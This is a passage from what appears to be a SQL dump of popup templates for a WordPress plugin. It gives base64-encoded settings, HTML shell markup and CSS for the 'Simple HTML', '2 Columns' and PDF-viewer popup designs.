M6MTIxOiJZb3UgaGF2ZSBuZXcgbWVtYmVyIG9uIHlvdXIgc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4sIGhlcmUgdXMgbWVtYmVyIGluZm9ybWF0aW9uOjxiciAvPltzdWJzY3JpYmVyX2RhdGFdIjt9czoxMDoib3B0c19hdHRycyI7YToyOntzOjk6ImJnX251bWJlciI7czoxOiIxIjtzOjE2OiJ0eHRfYmxvY2tfbnVtYmVyIjtzOjE6IjAiO319','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<iframe class=\"ppsMainFrame\" src=\"[iframe_url]\"></iframe>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	height: [height][height_measure];\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: content-box;\r\n	-moz-box-sizing:    content-box;\r\n	box-sizing:         content-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsMainFrame {\r\n  	width: 100%;\r\n  	height: 100%;\r\n  	border: 8px solid [bg_color_0];\r\n  	border-radius: 5px;\r\n  	padding: 0;\r\n  	margin: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n  	top: 15px;\r\n  	right: 10px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}','simple-iframe.jpg',1,1,1,4,0,0,0,'2015-01-10 17:59:43',30,0),(33,'Simple HTML',1,0,'YTozOntzOjQ6Im1haW4iO2E6MTk6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNzoic2hvd19vbl9zY3JvbGxfd2luZG93X2RlbGF5IjtzOjE6IjAiO3M6MzM6InNob3dfb25fc2Nyb2xsX3dpbmRvd19wZXJjX3Njcm9sbCI7czoxOiIwIjtzOjI4OiJzaG93X29uX2FmdGVyX2luYWN0aXZlX3ZhbHVlIjtzOjI6IjEwIjtzOjg6ImNsb3NlX29uIjtzOjEwOiJ1c2VyX2Nsb3NlIjtzOjI1OiJjbG9zZV9vbl9hZnRlcl90aW1lX3ZhbHVlIjtzOjE6IjUiO3M6MTA6InNob3dfcGFnZXMiO3M6MzoiYWxsIjtzOjE0OiJzaG93X3RpbWVfZnJvbSI7czo3OiIxMjowMGFtIjtzOjEyOiJzaG93X3RpbWVfdG8iO3M6NzoiMTI6MDBhbSI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5OiJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjIxOiJoaWRlX2Zvcl9kZXZpY2VzX3Nob3ciO3M6MToiMCI7czoyNDoiaGlkZV9mb3JfcG9zdF90eXBlc19zaG93IjtzOjE6IjAiO3M6MTc6ImhpZGVfZm9yX2lwc19zaG93IjtzOjE6IjAiO3M6MTI6ImhpZGVfZm9yX2lwcyI7czowOiIiO3M6MjM6ImhpZGVfZm9yX2NvdW50cmllc19zaG93IjtzOjE6IjAiO3M6MjM6ImhpZGVfZm9yX2xhbmd1YWdlc19zaG93IjtzOjE6IjAiO31zOjM6InRwbCI7YTozMjp7czo1OiJ3aWR0aCI7czozOiI0MDAiO3M6MTM6IndpZHRoX21lYXN1cmUiO3M6MjoicHgiO3M6MTg6ImJnX292ZXJsYXlfb3BhY2l0eSI7czozOiIwLjUiO3M6OToiYmdfdHlwZV8wIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18wIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMCI7czo3OiIjZmZmZmZmIjtzOjk6ImJnX3R5cGVfMSI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMSI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzEiO3M6NzoiIzAwNmRjMSI7czo5OiJjbG9zZV9idG4iO3M6OToic3FyX2Nsb3NlIjtzOjExOiJsYXllcmVkX3BvcyI7czozOiJ0b3AiO3M6OToiZW5iX3R4dF8wIjtzOjE6IjEiO3M6ODoiYW5pbV9rZXkiO3M6ODoic2xpZGVfdXAiO3M6MTM6ImFuaW1fZHVyYXRpb24iO3M6NDoiMTAwMCI7czoxODoibG9naW5fcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoxNToibG9naW5fYnRuX2xhYmVsIjtzOjA6IiI7czoxNjoicmVnX3JlZGlyZWN0X3VybCI7czowOiIiO3M6MjM6InJlZ193cF9jcmVhdGVfdXNlcl9yb2xlIjtzOjEwOiJzdWJzY3JpYmVyIjtzOjEzOiJyZWdfYnRuX2xhYmVsIjtzOjA6IiI7czoxMDoicmVnX2ZpZWxkcyI7YToyOntzOjQ6Im5hbWUiO2E6Nzp7czozOiJlbmIiO3M6MToiMSI7czo0OiJuYW1lIjtzOjQ6Im5hbWUiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjQ6Ik5hbWUiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIwIjt9czo1OiJlbWFpbCI7YTo3OntzOjQ6Im5hbWUiO3M6NToiZW1haWwiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjY6IkUtTWFpbCI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjEiO3M6MzoiZW5iIjtzOjE6IjEiO319czoyMDoicmVnX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InJlZ190eHRfc3VjY2VzcyI7czoyNzoiVGhhbmsgeW91IGZvciByZWdpc3RyYXRpb24hIjtzOjIxOiJyZWdfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6Mjg6InJlZ190eHRfY29uZmlybV9tYWlsX3N1YmplY3QiO3M6MzQ6IkNvbmZpcm0gcmVnaXN0cmF0aW9uIG9uIFtzaXRlbmFtZV0iO3M6MjU6InJlZ190eHRfY29uZmlybV9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjI4OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9tZXNzYWdlIjtzOjE5NjoiWW91IHJlZ2lzdGVyZWQgb24gc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4uIEZvbGxvdyA8YSBocmVmPVwiW2NvbmZpcm1fbGlua11cIj50aGlzIGxpbms8L2E+IHRvIGNvbXBsZXRlIHlvdXIgcmVnaXN0cmF0aW9uLiBJZiB5b3UgZGlkIG5vdCByZWdpc3RlciBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToicmVnX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoicmVnX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjEzOiJyZWdfbmV3X2VtYWlsIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoxNToicmVnX25ld19tZXNzYWdlIjtzOjEyMToiWW91IGhhdmUgbmV3IG1lbWJlciBvbiB5b3VyIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LCBoZXJlIHVzIG1lbWJlciBpbmZvcm1hdGlvbjo8YnIgLz5bc3Vic2NyaWJlcl9kYXRhXSI7czo1OiJ0eHRfMCI7czo4NDI6IjxwIHN0eWxlPVwidGV4dC1hbGlnbjogbGVmdDtcIj48YSBocmVmPVwiW1BQU19BU1NFVFNfVVJMXWltZy9hc3NldHMvYmVhdXRpZnVsLWJsb25kZS1mbG93ZXItZmxvd2Vycy1naXJsLUZhdmltLmNvbS0xNDM2MzUtMTUweDE1MC5qcGdcIj48aW1nIGNsYXNzPVwid3AtaW1hZ2UtMTcgc2l6ZS10aHVtYm5haWwgYWxpZ25sZWZ0XCIgc3JjPVwiW1BQU19BU1NFVFNfVVJMXWltZy9hc3NldHMvYmVhdXRpZnVsLWJsb25kZS1mbG93ZXItZmxvd2Vycy1naXJsLUZhdmltLmNvbS0xNDM2MzUtMTUweDE1MC5qcGdcIiBhbHQ9XCJcIiB3aWR0aD1cIjE3NlwiIGhlaWdodD1cIjE3NlwiIC8+PC9hPkxvcmVtIGlwc3VtIGRvbG9yIHNpdCBhbWV0LCBjb25zZWN0ZXR1ciBhZGlwaXNjaW5nIGVsaXQsIHNlZCBkbyBlaXVzbW9kIHRlbXBvciBpbmNpZGlkdW50IHV0IGxhYm9yZSBldCBkb2xvcmUgbWFnbmEgYWxpcXVhLjwvcD48cCBzdHlsZT1cInRleHQtYWxpZ246IGxlZnQ7XCI+PHN0cm9uZz5VdCBlbmltIGFkIG1pbmltIHZlbmlhbTwvc3Ryb25nPiwgcXVpcyBub3N0cnVkIGV4ZXJjaXRhdGlvbiB1bGxhbWNvIGxhYm9yaXMgbmlzaSB1dCBhbGlxdWlwIGV4IGVhIGNvbW1vZG8gY29uc2VxdWF0LiA8ZW0+RHVpcyBhdXRlIGlydXJlIGRvbG9yIGluIHJlcHJlaGVuZGVyaXQgaW4gdm9sdXB0YXRlIHZlbGl0IGVzc2UgY2lsbHVtIGRvbG9yZSBldSBmdWdpYXQgbnVsbGEgcGFyaWF0dXIuPC9lbT4gRXhjZXB0ZXVyIHNpbnQgb2NjYWVjYXQgY3VwaWRhdGF0IG5vbiBwcm9pZGVudCwgc3VudCBpbiBjdWxwYSBxdWkgb2ZmaWNpYSBkZXNlcnVudCBtb2xsaXQgYW5pbSBpZCBlc3QgbGFib3J1bS48L3A+Ijt9czoxMDoib3B0c19hdHRycyI7YToyOntzOjk6ImJnX251bWJlciI7czoxOiIyIjtzOjE2OiJ0eHRfYmxvY2tfbnVtYmVyIjtzOjE6IjEiO319','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		[txt_0]\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: \'Helvetica\', arial;\r\n	font-size: 14px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n	color: #000;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: content-box;\r\n	-moz-box-sizing:    content-box;\r\n	box-sizing:         content-box;\r\n}\r\n#ppsPopupShell_[ID] p {\r\n	margin: 14px 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	height: 100%;\r\n  	[if bg_type_1 == \'color\']\r\n  	border: 8px solid [bg_color_1];\r\n  	[endif]\r\n  	border-radius: 5px;\r\n  	padding: 10px;\r\n  	[if bg_type_0 == \'color\']\r\n  	background-color: [bg_color_0];\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}','simple-html.jpg',1,1,1,5,0,0,0,'2015-01-10 17:59:43',31,0),(34,'HTML 2 Columns',1,0,'YTozOntzOjQ6Im1haW4iO2E6MTk6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNzoic2hvd19vbl9zY3JvbGxfd2luZG93X2RlbGF5IjtzOjE6IjAiO3M6MzM6InNob3dfb25fc2Nyb2xsX3dpbmRvd19wZXJjX3Njcm9sbCI7czoxOiIwIjtzOjI4OiJzaG93X29uX2FmdGVyX2luYWN0aXZlX3ZhbHVlIjtzOjI6IjEwIjtzOjg6ImNsb3NlX29uIjtzOjEwOiJ1c2VyX2Nsb3NlIjtzOjI1OiJjbG9zZV9vbl9hZnRlcl90aW1lX3ZhbHVlIjtzOjE6IjUiO3M6MTA6InNob3dfcGFnZXMiO3M6MzoiYWxsIjtzOjE0OiJzaG93X3RpbWVfZnJvbSI7czo3OiIxMjowMGFtIjtzOjEyOiJzaG93X3RpbWVfdG8iO3M6NzoiMTI6MDBhbSI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5OiJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjIxOiJoaWRlX2Zvcl9kZXZpY2VzX3Nob3ciO3M6MToiMCI7czoyNDoiaGlkZV9mb3JfcG9zdF90eXBlc19zaG93IjtzOjE6IjAiO3M6MTc6ImhpZGVfZm9yX2lwc19zaG93IjtzOjE6IjAiO3M6MTI6ImhpZGVfZm9yX2lwcyI7czowOiIiO3M6MjM6ImhpZGVfZm9yX2NvdW50cmllc19zaG93IjtzOjE6IjAiO3M6MjM6ImhpZGVfZm9yX2xhbmd1YWdlc19zaG93IjtzOjE6IjAiO31zOjM6InRwbCI7YTozNDp7czo1OiJ3aWR0aCI7czozOiI2MDAiO3M6MTM6IndpZHRoX21lYXN1cmUiO3M6MjoicHgiO3M6MTg6ImJnX292ZXJsYXlfb3BhY2l0eSI7czozOiIwLjUiO3M6OToiYmdfdHlwZV8wIjtzOjM6ImltZyI7czo4OiJiZ19pbWdfMCI7czozOToiW1BQU19BU1NFVFNfVVJMXWltZy9hc3NldHMvcmFpbi0wMzEuanBnIjtzOjEwOiJiZ19jb2xvcl8wIjtzOjc6IiNmZmZmZmYiO3M6OToiYmdfdHlwZV8xIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18xIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMSI7czo3OiIjMDAwMDAwIjtzOjk6ImNsb3NlX2J0biI7czoxMToibGlzdHNfYmxhY2siO3M6MTE6ImxheWVyZWRfcG9zIjtzOjM6InRvcCI7czo5OiJlbmJfdHh0XzAiO3M6MToiMSI7czo5OiJlbmJfdHh0XzEiO3M6MToiMSI7czo4OiJhbmltX2tleSI7czoxMjoiYm91bmNlX3JpZ2h0IjtzOjEzOiJhbmltX2R1cmF0aW9uIjtzOjQ6IjEwMDAiO3M6MTg6ImxvZ2luX3JlZGlyZWN0X3VybCI7czowOiIiO3M6MTU6ImxvZ2luX2J0bl9sYWJlbCI7czowOiIiO3M6MTY6InJlZ19yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjIzOiJyZWdfd3BfY3JlYXRlX3VzZXJfcm9sZSI7czoxMDoic3Vic2NyaWJlciI7czoxMzoicmVnX2J0bl9sYWJlbCI7czowOiIiO3M6MTA6InJlZ19maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjc6e3M6MzoiZW5iIjtzOjE6IjEiO3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InJlZ190eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJyZWdfdHh0X3N1Y2Nlc3MiO3M6Mjc6IlRoYW5rIHlvdSBmb3IgcmVnaXN0cmF0aW9uISI7czoyMToicmVnX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjI4OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9zdWJqZWN0IjtzOjM0OiJDb25maXJtIHJlZ2lzdHJhdGlvbiBvbiBbc2l0ZW5hbWVdIjtzOjI1OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoyODoicmVnX3R4dF9jb25maXJtX21haWxfbWVzc2FnZSI7czoxOTY6IllvdSByZWdpc3RlcmVkIG9uIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LiBGb2xsb3cgPGEgaHJlZj1cIltjb25maXJtX2xpbmtdXCI+dGhpcyBsaW5rPC9hPiB0byBjb21wbGV0ZSB5b3VyIHJlZ2lzdHJhdGlvbi4gSWYgeW91IGRpZCBub3QgcmVnaXN0ZXIgaGVyZSAtIGp1c3QgaWdub3JlIHRoaXMgbWVzc2FnZS4iO3M6MzE6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX3N1YmplY3QiO3M6Mzc6IltzaXRlbmFtZV0gWW91ciB1c2VybmFtZSBhbmQgcGFzc3dvcmQiO3M6Mjg6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjMxOiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9tZXNzYWdlIjtzOjY1OiJVc2VybmFtZTogW3VzZXJfbG9naW5dPGJyIC8+UGFzc3dvcmQ6IFtwYXNzd29yZF08YnIgLz5bbG9naW5fdXJsXSI7czoxMzoicmVnX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InJlZ19uZXdfbWVzc2FnZSI7czoxMjE6IllvdSBoYXZlIG5ldyBtZW1iZXIgb24geW91ciBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwgaGVyZSB1cyBtZW1iZXIgaW5mb3JtYXRpb246PGJyIC8+W3N1YnNjcmliZXJfZGF0YV0iO3M6NToidHh0XzAiO3M6NTMyOiI8cCBzdHlsZT1cInRleHQtYWxpZ246IGNlbnRlcjtcIj48YSBocmVmPVwiW1BQU19TSVRFX1VSTF13cC1jb250ZW50L3VwbG9hZHMvMjAxNS8xMS9yYWluLWdpcmwuanBnXCI+PGltZyBjbGFzcz1cImFsaWdubm9uZSB3cC1pbWFnZS0yMCBzaXplLW1lZGl1bVwiIHNyYz1cIltQUFNfU0lURV9VUkxdd3AtY29udGVudC91cGxvYWRzLzIwMTUvMTEvcmFpbi1naXJsLTMwMHgxNjkuanBnXCIgYWx0PVwiXCIgd2lkdGg9XCIzMDBcIiBoZWlnaHQ9XCIxNjlcIiAvPjwvYT48L3A+PHAgc3R5bGU9XCJ0ZXh0LWFsaWduOiBjZW50ZXI7XCI+TG9yZW0gPHNwYW4gc3R5bGU9XCJjb2xvcjogIzk5MzMwMDtcIj5pcHN1bSA8c3Ryb25nPmRvbG9yIHNpdCBhbWV0PC9zdHJvbmc+LCBjb25zZWN0ZXR1ciBhZGlwaXNjaW5nIGVsaXQ8L3NwYW4+LCA8c3BhbiBzdHlsZT1cImNvbG9yOiAjZmY2NjAwO1wiPjxlbT5zZWQgZG8gZWl1c21vZDwvZW0+PC9zcGFuPiB0ZW1wb3IgaW5jaWRpZHVudCB1dCBsYWJvcmUgZXQgZG9sb3JlIG1hZ25hIGFsaXF1YS48L3A+IjtzOjU6InR4dF8xIjtzOjYyMDoiPGgyIHN0eWxlPVwidGV4dC1hbGlnbjogY2VudGVyO1wiPjxzcGFuIHN0eWxlPVwiY29sb3I6ICNmZjY2MDA7XCI+PHN0cm9uZz5BQk9VVCBVUzwvc3Ryb25nPjwvc3Bhbj48L2gyPjxwIHN0eWxlPVwidGV4dC1hbGlnbjogY2VudGVyO1wiPkxvcmVtIDxzcGFuIHN0eWxlPVwiY29sb3I6ICM5OWNjMDA7XCI+PHN0cm9uZz5pcHN1bSBkb2xvciBzaXQgYW1ldDwvc3Ryb25nPjwvc3Bhbj4sIGNvbnNlY3RldHVyIGFkaXBpc2NpbmcgZWxpdCwgc2VkIGRvIGVpdXNtb2QgdGVtcG9yIGluY2lkaWR1bnQgdXQgbGFib3JlPHNwYW4gc3R5bGU9XCJ0ZXh0LWRlY29yYXRpb246IHVuZGVybGluZTtcIj4gZXQgZG9sb3JlIG1hZ25hPC9zcGFuPiBhbGlxdWEuPC9wPjxwIHN0eWxlPVwidGV4dC1hbGlnbjogY2VudGVyO1wiPkR1aXMgYXV0ZSBpcnVyZSBkb2xvciBpbiByZXByZWhlbmRlcml0IGluIHZvbHVwdGF0ZSB2ZWxpdCBlc3NlIGNpbGx1bSBkb2xvcmUgZXUgZnVnaWF0IG51bGxhIHBhcmlhdHVyLiBFeGNlcHRldXIgc2ludCBvY2NhZWNhdCBjdXBpZGF0YXQgbm9uIHByb2lkZW50LCBzdW50IGluIGN1bHBhIHF1aSBvZmZpY2lhIGRlc2VydW50IG1vbGxpdCBhbmltIGlkIGVzdCBsYWJvcnVtLjwvcD4iO31zOjEwOiJvcHRzX2F0dHJzIjthOjI6e3M6OToiYmdfbnVtYmVyIjtzOjE6IjIiO3M6MTY6InR4dF9ibG9ja19udW1iZXIiO3M6MToiMiI7fX0=','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n      	[if enb_txt_0]\r\n      	<div class=\"ppsCol\">[txt_0]</div>\r\n      	[endif]\r\n      	[if enb_txt_1]\r\n      	<div class=\"ppsCol\">[txt_1]</div>\r\n      	[endif]\r\n      	<div style=\"clear: both;\"></div	>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: \'Helvetica\', arial;\r\n	font-size: 14px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n	color: #fff;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: border-box;\r\n	-moz-box-sizing:    border-box;\r\n	box-sizing:         border-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	height: 100%;\r\n  	[if bg_type_1 == \'color\']\r\n  	border: 8px solid [bg_color_1];\r\n  	[endif]\r\n  	border-radius: 5px;\r\n  	padding: 10px;\r\n  	[if bg_type_0 == \'color\']\r\n  	background-color: [bg_color_0];\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsCol {\r\n	float: left;\r\n  	margin: 0;\r\n  	padding: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsCol img {\r\n	width: 100% !important;\r\n  	height: auto !important;\r\n}\r\n{% if [enb_txt_0] and [enb_txt_1] %}\r\n#ppsPopupShell_[ID] .ppsCol {\r\n	width: 50%;\r\n}\r\n{% endif %}\r\n\r\n','html-2-columns.jpg',1,1,1,5,0,0,0,'2015-01-10 17:59:43',32,0),(35,'PDF PopUp',1,0,'YTozOntzOjQ6Im1haW4iO2E6Mjk6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoyNjoiY2xvc2Vfb25fYWZ0ZXJfYWN0aW9uX3RpbWUiO3M6MToiMSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6MTQ6InNob3dfZGF0ZV9mcm9tIjtzOjA6IiI7czoxMjoic2hvd19kYXRlX3RvIjtzOjA6IiI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5OiJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjE1OiJjb3VudF90aW1lc19udW0iO3M6MToiMSI7czoxNToiY291bnRfdGltZXNfbWVzIjtzOjM6ImRheSI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX3NlYXJjaF9lbmdpbmVzX3Nob3ciO3M6MToiMCI7czoxODoiaGlkZV9wcmVnX3VybF9zaG93IjtzOjE6IjAiO3M6MTM6ImhpZGVfcHJlZ191cmwiO3M6MDoiIjt9czozOiJ0cGwiO2E6MTQ6e3M6NzoicGRmX3VybCI7czo0NjoiW1BQU19BU1NFVFNfVVJMXWltZy9hc3NldHMvaGVhbHRoeS1jb29raW5nLnBkZiI7czo1OiJ3aWR0aCI7czozOiI0MDAiO3M6MTM6IndpZHRoX21lYXN1cmUiO3M6MjoicHgiO3M6NjoiaGVpZ2h0IjtzOjM6IjU0MCI7czoxNDoiaGVpZ2h0X21lYXN1cmUiO3M6MjoicHgiO3M6MTg6ImJnX292ZXJsYXlfb3BhY2l0eSI7czozOiIwLjUiO3M6OToiYmdfdHlwZV8wIjtzOjQ6Im5vbmUiO3M6ODoiYmdfaW1nXzAiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8wIjtzOjc6IiNmZmZmZmYiO3M6MTc6InJlaWRyZWN0X29uX2Nsb3NlIjtzOjA6IiI7czo5OiJjbG9zZV9idG4iO3M6MTE6Imxpc3RzX2JsYWNrIjtzOjExOiJsYXllcmVkX3BvcyI7czozOiJ0b3AiO3M6ODoiYW5pbV9rZXkiO3M6NDoibm9uZSI7czoxMzoiYW5pbV9kdXJhdGlvbiI7czo0OiIxMDAwIjt9czoxMDoib3B0c19hdHRycyI7YToyOntzOjk6ImJnX251bWJlciI7czoxOiIxIjtzOjE2OiJ0eHRfYmxvY2tfbnVtYmVyIjtzOjE6IjAiO319','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<iframe class=\"ppsMainFrame\" src=\"https://docs.google.com/gview?url=[pdf_url]&embedded=true\"></iframe>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	height: [height][height_measure];\r\n  	[if bg_type_0 == \'color\']\r\n	background-color: [bg_color_0];\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: content-box;\r\n	-moz-box-sizing:    content-box;\r\n	box-sizing:         content-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsMainFrame {\r\n  	width: 100%;\r\n  	height: 100%;\r\n  	[if enb_bg_0]\r\n  	